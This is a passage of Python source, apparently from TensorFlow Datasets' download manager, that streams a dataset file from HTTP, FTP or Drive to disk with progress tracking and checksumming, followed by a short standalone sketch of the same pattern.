      url = self._get_drive_url(url, session)
    use_urllib = url.startswith('ftp')
    if use_urllib:
      if proxies['ftp']:
        proxy = urllib.request.ProxyHandler({'ftp': proxies['ftp']})
        opener = urllib.request.build_opener(proxy)
        urllib.request.install_opener(opener)   # pylint: disable=too-many-function-args
      request = urllib.request.Request(url)
      response = urllib.request.urlopen(request)
    else:
      response = session.get(url, stream=True)
      if response.status_code != 200:
        raise DownloadError('Failed to get url %s. HTTP code: %d.' %
                            (url, response.status_code))
    fname = _get_filename(response)
    path = os.path.join(destination_path, fname)
    size = 0

    size_mb = 0
    unit_mb = units.MiB
    self._pbar_dl_size.update_total(
        int(response.headers.get('Content-length', 0)) // unit_mb)
    with tf.io.gfile.GFile(path, 'wb') as file_:
      checksum = self._checksumer()
      if use_urllib:
        iterator = iter(lambda: response.read(io.DEFAULT_BUFFER_SIZE), b'')
      else:
        iterator = response.iter_content(chunk_size=io.DEFAULT_BUFFER_SIZE)

      for block in iterator:
        size += len(block)

        # Update the progress bar
        size_mb += len(block)
        if size_mb > unit_mb:
          self._pbar_dl_size.update(size_mb // unit_mb)
          size_mb %= unit_mb

        checksum.update(block)
        file_.write(block)
    self._pbar_url.update(1)
    return checksum.hexdigest(), size
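
Stripped of the TFDS-specific machinery above (progress bars, Kaggle/Drive/FTP handling), the core streaming pattern can be sketched on its own; the function name and chunk size below are illustrative assumptions, not part of the snippet above:

import hashlib
import os

import requests


def download_with_checksum(url, destination_dir, chunk_size=8192):
    # Stream the body so large files never sit fully in memory,
    # hashing each chunk as it is written to disk.
    session = requests.Session()
    response = session.get(url, stream=True, timeout=30)
    response.raise_for_status()
    checksum = hashlib.sha256()
    fname = url.rsplit('/', 1)[-1] or 'download'
    path = os.path.join(destination_dir, fname)
    size = 0
    with open(path, 'wb') as file_:
        for block in response.iter_content(chunk_size=chunk_size):
            checksum.update(block)
            file_.write(block)
            size += len(block)
    return checksum.hexdigest(), size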